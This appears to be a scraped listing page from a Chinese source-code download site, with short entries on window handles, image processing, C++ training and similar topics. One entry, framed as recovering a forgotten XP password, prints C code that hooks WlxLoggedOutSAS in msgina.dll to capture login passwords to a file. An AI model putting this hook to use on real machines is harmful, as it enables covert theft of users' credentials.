-
Getting The Filename Given A Window Handle, window handle to obtain the file nam...
Getting The Filename Given A Window Handle,获得窗口句柄的文件名,学习源码。
-Getting The Filename Given A Window Handle, window handle to obtain the file name, learning source.
- 2022-03-22 02:07:26下载
- 积分:1
-
multiplemethod中方法。结合的可能性分布的分布规律
MultipleMethod mid mothed.Possibility Combination Distribute by Distribute Rule-MultipleMethod mid mothed.Possibility C ombination Distribute by Distribute Rule
- 2022-02-03 23:48:26下载
- 积分:1
-
Marvell WIFI CF8381P labtool.zip
Marvell WIFI CF8381P labtool.zip
- 2022-09-16 01:05:03下载
- 积分:1
-
华为内部培训资料,C++中级培训资料,对C++进阶知识讲解
华为内部培训资料,C++中级培训资料,对C++进阶知识讲解-Huawei
- 2022-04-01 14:36:34下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
on mouse called C code
关于C下调用鼠标的代码-on mouse called C code
- 2022-07-25 05:14:36下载
- 积分:1
-
很快
bpsk的算法实现,运行快,计算量少,误差小。-very fast
- 2022-10-27 15:10:04下载
- 积分:1
-
图像处理
该工程是对图像进行一系列简单处理的源代码,包括灰度处理,图像滤波,图像锐化,均衡化,边缘检测,数字剪影等。希望对图像处理的初学者有一定的帮助。
- 2022-04-07 09:21:47下载
- 积分:1
-
可在画板上绘制三棱锥、四棱锥、五棱锥。图形可更换颜色。...
可在画板上绘制三棱锥、四棱锥、五棱锥。图形可更换颜色。-Can be drawn on the drawing board three pyramid, four pyramid, five pyramid. Graphics can change the color.
- 2022-05-23 22:13:09下载
- 积分:1
-
多尺度谱图分割
基于多尺度的ncut规范化谱聚类图割方法 可用作数据聚类和图像分割效果很好
- 2022-06-27 04:49:27下载
- 积分:1